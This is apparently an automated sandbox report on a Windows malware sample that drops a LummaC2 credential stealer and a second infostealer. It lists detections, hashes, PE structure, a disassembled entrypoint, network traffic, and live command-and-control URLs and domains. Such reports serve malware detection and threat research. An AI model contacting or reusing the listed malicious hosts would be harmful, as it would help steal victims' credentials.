Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	4 Obfuscated Files or Information	Cached Domain Credentials	214 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
OAKPYEH4c6.exe	55%	ReversingLabs	Win32.Trojan.Generic
OAKPYEH4c6.exe	100%	Avira	HEUR/AGEN.1313526
OAKPYEH4c6.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\LummaC2.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\LummaC2.exe	55%	ReversingLabs	Win32.Trojan.MintZard
C:\Users\user\AppData\Local\Temp\Set-up.exe	26%	ReversingLabs	Win32.Infostealer.Tinba

Source	Detection	Scanner	Label
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003	100%	Avira URL Cloud	malware
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003?argument=0	100%	Avira URL Cloud	malware
censeractersj.click	0%	Avira URL Cloud	safe
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP13	100%	Avira URL Cloud	malware
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003http://home.fortth14ht.top/nTrmoVgOaovBJpKS	100%	Avira URL Cloud	malware
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003lse	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
home.fortth14ht.top	185.121.15.192	true	false		high
httpbin.org	34.226.108.155	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003	true	Avira URL Cloud: malware	unknown
wordyfindy.lat	false		high
slipperyloo.lat	false		high
curverpluch.lat	false		high
tentabatte.lat	false		high
manyrestro.lat	false		high
bashfulacid.lat	false		high
censeractersj.click	true	Avira URL Cloud: safe	unknown
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003?argument=0	true	Avira URL Cloud: malware	unknown
shapestickyr.lat	false		high
https://httpbin.org/ip	false		high
talkynicer.lat	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://curl.se/docs/hsts.html	Set-up.exe.0.dr	false		high
http://html4/loose.dtd	OAKPYEH4c6.exe, 00000000.00000002.1572012158.000000000789F000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000000.1541743616.000000000136B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	false		high
https://httpbin.org/ipbefore	OAKPYEH4c6.exe, 00000000.00000002.1572012158.000000000789F000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000000.1541743616.000000000136B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	false		high
https://curl.se/docs/http-cookies.html	OAKPYEH4c6.exe, 00000000.00000002.1572012158.000000000789F000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000000.1541743616.000000000136B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	false		high
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP13	Set-up.exe.0.dr	false	Avira URL Cloud: malware	unknown
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003http://home.fortth14ht.top/nTrmoVgOaovBJpKS	Set-up.exe, 00000003.00000002.1767266161.0000000001369000.00000004.00000001.01000000.00000008.sdmp	true	Avira URL Cloud: malware	unknown
https://curl.se/docs/alt-svc.html	Set-up.exe.0.dr	false		high
http://.css	OAKPYEH4c6.exe, 00000000.00000002.1572012158.000000000789F000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000000.1541743616.000000000136B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	false		high
http://.jpg	OAKPYEH4c6.exe, 00000000.00000002.1572012158.000000000789F000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000000.1541743616.000000000136B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	false		high
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003lse	Set-up.exe, 00000003.00000003.1765822531.0000000001749000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.1766033118.000000000174E000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.1766204519.0000000001750000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.1766547847.0000000001751000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.1767771085.0000000001752000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.121.15.192	home.fortth14ht.top	Spain		207046	REDSERVICIOES	false
34.226.108.155	httpbin.org	United States		14618	AMAZON-AESUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1581389
Start date and time:	2024-12-27 14:52:11 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 55s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	OAKPYEH4c6.exe renamed because original name is a hash value
Original Sample Name:	e005ba79c9ed37cf2f37fd4dd51fc287.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@5/3@8/2
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.63
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target OAKPYEH4c6.exe, PID 1736 because it is empty
Execution Graph export aborted for target Set-up.exe, PID 6964 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: OAKPYEH4c6.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.121.15.192	YrxiR3yCLm.exe	Get hash	malicious	LummaC	Browse	home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003
	Cph7VEeu1r.exe	Get hash	malicious	LummaC	Browse	home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003
	3stIhG821a.exe	Get hash	malicious	LummaC	Browse	home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003
	8wiUGtm9UM.exe	Get hash	malicious	LummaC	Browse	home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003
	vJPhYDClT5.exe	Get hash	malicious	Unknown	Browse	home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
	jklg6EIhyR.exe	Get hash	malicious	Unknown	Browse	home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
	qr2JeuLuOQ.exe	Get hash	malicious	Unknown	Browse	home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
	E6rBvcWFWu.exe	Get hash	malicious	Unknown	Browse	home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
	gDPzgKHFws.exe	Get hash	malicious	Cryptbot	Browse	home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
	HFoyAy1tg8.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	fivetk5sb.top/v1/upload.php
34.226.108.155	BkB1ur7aFW.exe	Get hash	malicious	Unknown	Browse
	5uVReRlvME.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Remcos, Stealc	Browse
	3stIhG821a.exe	Get hash	malicious	LummaC	Browse
	4o4t8dO4r1.exe	Get hash	malicious	Unknown	Browse
	8wiUGtm9UM.exe	Get hash	malicious	LummaC	Browse
	mBr65h6L4w.exe	Get hash	malicious	Unknown	Browse
	HrIrtCXI3s.exe	Get hash	malicious	Unknown	Browse
	vJPhYDClT5.exe	Get hash	malicious	Unknown	Browse
	jklg6EIhyR.exe	Get hash	malicious	Unknown	Browse
	qr2JeuLuOQ.exe	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
httpbin.org	BkB1ur7aFW.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	OoYYtngD7d.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	NWJ4JvzFcs.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	EwhnoHx0n5.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	PqHnYMj5eF.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	YrxiR3yCLm.exe	Get hash	malicious	LummaC	Browse	3.218.7.103
	qZA8AyGxiA.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	Cph7VEeu1r.exe	Get hash	malicious	LummaC	Browse	3.218.7.103
	3stIhG821a.exe	Get hash	malicious	LummaC	Browse	34.226.108.155
	4o4t8dO4r1.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
home.fortth14ht.top	YrxiR3yCLm.exe	Get hash	malicious	LummaC	Browse	185.121.15.192
	Cph7VEeu1r.exe	Get hash	malicious	LummaC	Browse	185.121.15.192
	3stIhG821a.exe	Get hash	malicious	LummaC	Browse	185.121.15.192
	8wiUGtm9UM.exe	Get hash	malicious	LummaC	Browse	185.121.15.192

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
REDSERVICIOES	YrxiR3yCLm.exe	Get hash	malicious	LummaC	Browse	185.121.15.192
	Cph7VEeu1r.exe	Get hash	malicious	LummaC	Browse	185.121.15.192
	3stIhG821a.exe	Get hash	malicious	LummaC	Browse	185.121.15.192
	DRWgoZo325.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, Vidar	Browse	185.121.15.192
	8wiUGtm9UM.exe	Get hash	malicious	LummaC	Browse	185.121.15.192
	vJPhYDClT5.exe	Get hash	malicious	Unknown	Browse	185.121.15.192
	jklg6EIhyR.exe	Get hash	malicious	Unknown	Browse	185.121.15.192
	qr2JeuLuOQ.exe	Get hash	malicious	Unknown	Browse	185.121.15.192
	E6rBvcWFWu.exe	Get hash	malicious	Unknown	Browse	185.121.15.192
	gDPzgKHFws.exe	Get hash	malicious	Cryptbot	Browse	185.121.15.192
AMAZON-AESUS	BkB1ur7aFW.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	5uVReRlvME.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Remcos, Stealc	Browse	34.226.108.155
	db0fa4b8db0333367e9bda3ab68b8042.i686.elf	Get hash	malicious	Mirai, Gafgyt	Browse	34.195.210.183
	OoYYtngD7d.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	NWJ4JvzFcs.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	EwhnoHx0n5.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	PqHnYMj5eF.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	YrxiR3yCLm.exe	Get hash	malicious	LummaC	Browse	3.218.7.103
	qZA8AyGxiA.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	Cph7VEeu1r.exe	Get hash	malicious	LummaC	Browse	3.218.7.103

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\LummaC2.exe	YrxiR3yCLm.exe	Get hash	malicious	LummaC	Browse
	Cph7VEeu1r.exe	Get hash	malicious	LummaC	Browse
	3stIhG821a.exe	Get hash	malicious	LummaC	Browse
	DRWgoZo325.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, Vidar	Browse
	8wiUGtm9UM.exe	Get hash	malicious	LummaC	Browse
C:\Users\user\AppData\Local\Temp\Set-up.exe	YrxiR3yCLm.exe	Get hash	malicious	LummaC	Browse
	Cph7VEeu1r.exe	Get hash	malicious	LummaC	Browse
	3stIhG821a.exe	Get hash	malicious	LummaC	Browse
	DRWgoZo325.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, Vidar	Browse
	8wiUGtm9UM.exe	Get hash	malicious	LummaC	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\OAKPYEH4c6.exe.log

Download File

Process:	C:\Users\user\Desktop\OAKPYEH4c6.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Temp\LummaC2.exe

Download File

Process:	C:\Users\user\Desktop\OAKPYEH4c6.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	299520
Entropy (8bit):	6.860310132420335
Encrypted:	false
SSDEEP:	6144:R5s/zt4HV88/rCatOZFABeDUbLv0uC8r9qMq2E9ND43F+ZnSi4:8rtsVPrNMG9qwENs8ZJ4
MD5:	607000C61FCB5A41B8D511B5ED7625D4
SHA1:	DFAA2BFEA8A51B14AC089BB6A39F037E769169D1
SHA-256:	C9831759E15B3A52238C03D0D51DB9DE0C1A6C7A61A51DE72C5869061172E9DB
SHA-512:	64940F02635CCBC2DCD42449C0C435A6A50BD00FA93D6E2E161371CDC766103EF858CCBAAE4497A75576121EA7BC25BA54A9064748F9D6676989A4C9F8B50E58
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 55%
Joe Sandbox View:	Filename: YrxiR3yCLm.exe, Detection: malicious, Browse Filename: Cph7VEeu1r.exe, Detection: malicious, Browse Filename: 3stIhG821a.exe, Detection: malicious, Browse Filename: DRWgoZo325.exe, Detection: malicious, Browse Filename: 8wiUGtm9UM.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...xZig............................ .............@..........................P............@.....................................................................(9...................................................................................text............................... ..`.rdata... ......."..................@..@.data...L....0...P..................@....reloc..(9.......:...X..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Set-up.exe

Download File

Process:	C:\Users\user\Desktop\OAKPYEH4c6.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	6851208
Entropy (8bit):	6.451509958428788
Encrypted:	false
SSDEEP:	98304:ty1CDpiB/weoINcERH7q/70/ske9dKVyz8SC:jViB/NooB7edGG8SC
MD5:	2A99036C44C996CEDEB2042D389FE23C
SHA1:	4F1E624BCC030E44722DE26B72C8156BF57E14E8
SHA-256:	73AA5EE19F0EA048DCFF2F44D6FD5AC41C13E2D7E61371459E756836F72CAD43
SHA-512:	6907CD0E47293C8C96345ED00F2F3FA2241CE1671EE73A599837857BFB39F6C7E373AAD843CC78FB550D2DB10BDFE066A021CEC4C8A49AECDF06A7E71EDADEDD
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 26%
Joe Sandbox View:	Filename: YrxiR3yCLm.exe, Detection: malicious, Browse Filename: Cph7VEeu1r.exe, Detection: malicious, Browse Filename: 3stIhG821a.exe, Detection: malicious, Browse Filename: DRWgoZo325.exe, Detection: malicious, Browse Filename: 8wiUGtm9UM.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5mg...............(.hK...h..2............K...@...........................i......h...@... ..............................`e..-....................h.......e.`L...........................0d......................he. ............................text....gK......hK.................`..`.data...D(....K..*...lK.............@....rdata........O.. ....O.............@..@.eh_framdM....d..N....d.............@..@.bss.....1... e..........................idata...-...`e.......e.............@....CRT....0.....e......2e.............@....tls..........e......4e.............@....reloc..`L....e..N...6e.............@..B........................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.982293636005915
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	OAKPYEH4c6.exe
File size:	6'224'896 bytes
MD5:	e005ba79c9ed37cf2f37fd4dd51fc287
SHA1:	efbebac49553150c0b53f173ed5ec56d6977754a
SHA256:	147e5a90a4aa996af89ed826f3ce38c8626fe94a291568c45c8df009f9f4b814
SHA512:	a1c0ad22c99e7e1b6649567d17ca7a662f1fcc0616af47bc264cf92a1ff7c8d2242e23c8c0be83309457d58a376cdf743cd93a868d69ad166bed1c08107ed132
SSDEEP:	98304:JLaNOPPdaK7N6F7ZnwnBwZuMDmVPA3FsNnACSAHeemiGW1k1o8jaUaKgLRrKSpOY:JLTNaKU1ZwiilP9AC7Ho/G8mUa1Lt7pN
TLSH:	215633100CE59C38EFB6B674E006AD3BF88E340A01B6BEB48465EF16CF57E445689B57
File Content Preview:	MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....mg.................<m.............. ...`m...@.. ...............................%_...@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0xf3c000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE
Time Stamp:	0x676D92AB [Thu Dec 26 17:30:19 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F3398BED55Ah
pminub mm3, qword ptr [esi+00h]
add byte ptr [eax], al
add byte ptr [eax], al
jmp 00007F3398BEF555h
add byte ptr [ecx], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edx], al
or al, byte ptr [eax]
add byte ptr [0100000Ah], al
or al, byte ptr [eax]
add byte ptr [ebx], cl
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ebx], cl
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edi], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add ecx, dword ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
or byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6d8055	0x69	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x6d6000	0x53c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x6d81f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x2000	0x6d4000	0x43d600	27e22469167de0c8131faa54ba2a7c22	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x6d6000	0x53c	0x400	b565f6cd7306c4d140a88fce5cbb86c6	False	0.6884765625	data	5.665459713537131	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x6d8000	0x2000	0x200	6e9890d240b48e1a4145e7c2679977e3	False	0.150390625	data	1.0043697745670233	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x6da000	0x2b2000	0x200	89d6f23dda5b02908aa69a2fca596f37	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
pjfeqmbk	0x98c000	0x1ae000	0x1ad800	d8fecc180fe6ca55a8f348f801289256	False	0.9948227408323632	data	7.954441011910132	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
bqwrlfcf	0xb3a000	0x2000	0x400	eadfaa5a2d8d3a34da015a4ac4345c9c	False	0.8056640625	data	6.198668454767592	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0xb3c000	0x4000	0x2200	eded2120433f9219a2d6ac2a8835d54c	False	0.06744025735294118	DOS executable (COM)	0.8116135501684012	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xb392c0	0x244	data			0.4689655172413793
RT_MANIFEST	0xb39504	0x256	ASCII text, with CRLF line terminators			0.5100334448160535

Imports

DLL	Import
kernel32.dll	lstrcpy

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 27, 2024 14:53:26.235117912 CET	49705	443	192.168.2.8	34.226.108.155
Dec 27, 2024 14:53:26.235157967 CET	443	49705	34.226.108.155	192.168.2.8
Dec 27, 2024 14:53:26.235240936 CET	49705	443	192.168.2.8	34.226.108.155
Dec 27, 2024 14:53:26.238399029 CET	49705	443	192.168.2.8	34.226.108.155
Dec 27, 2024 14:53:26.238414049 CET	443	49705	34.226.108.155	192.168.2.8
Dec 27, 2024 14:53:28.060735941 CET	443	49705	34.226.108.155	192.168.2.8
Dec 27, 2024 14:53:28.061901093 CET	49705	443	192.168.2.8	34.226.108.155
Dec 27, 2024 14:53:28.061918974 CET	443	49705	34.226.108.155	192.168.2.8
Dec 27, 2024 14:53:28.063381910 CET	443	49705	34.226.108.155	192.168.2.8
Dec 27, 2024 14:53:28.063651085 CET	49705	443	192.168.2.8	34.226.108.155
Dec 27, 2024 14:53:28.064996958 CET	49705	443	192.168.2.8	34.226.108.155
Dec 27, 2024 14:53:28.065078020 CET	443	49705	34.226.108.155	192.168.2.8
Dec 27, 2024 14:53:28.089916945 CET	49705	443	192.168.2.8	34.226.108.155
Dec 27, 2024 14:53:28.089936018 CET	443	49705	34.226.108.155	192.168.2.8
Dec 27, 2024 14:53:28.133708000 CET	49705	443	192.168.2.8	34.226.108.155
Dec 27, 2024 14:53:28.749672890 CET	443	49705	34.226.108.155	192.168.2.8
Dec 27, 2024 14:53:28.749803066 CET	443	49705	34.226.108.155	192.168.2.8
Dec 27, 2024 14:53:28.749846935 CET	49705	443	192.168.2.8	34.226.108.155
Dec 27, 2024 14:53:28.750830889 CET	49705	443	192.168.2.8	34.226.108.155
Dec 27, 2024 14:53:28.750855923 CET	443	49705	34.226.108.155	192.168.2.8
Dec 27, 2024 14:53:40.922029972 CET	49709	80	192.168.2.8	185.121.15.192
Dec 27, 2024 14:53:41.041538954 CET	80	49709	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:41.041867971 CET	49709	80	192.168.2.8	185.121.15.192
Dec 27, 2024 14:53:41.049412012 CET	49709	80	192.168.2.8	185.121.15.192
Dec 27, 2024 14:53:41.168979883 CET	80	49709	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:41.169008970 CET	80	49709	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:41.169075966 CET	80	49709	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:41.169086933 CET	49709	80	192.168.2.8	185.121.15.192
Dec 27, 2024 14:53:41.169121981 CET	80	49709	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:41.169131994 CET	80	49709	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:41.169133902 CET	49709	80	192.168.2.8	185.121.15.192
Dec 27, 2024 14:53:41.169159889 CET	80	49709	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:41.169173002 CET	49709	80	192.168.2.8	185.121.15.192
Dec 27, 2024 14:53:41.169193983 CET	49709	80	192.168.2.8	185.121.15.192
Dec 27, 2024 14:53:41.169193983 CET	80	49709	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:41.169259071 CET	49709	80	192.168.2.8	185.121.15.192
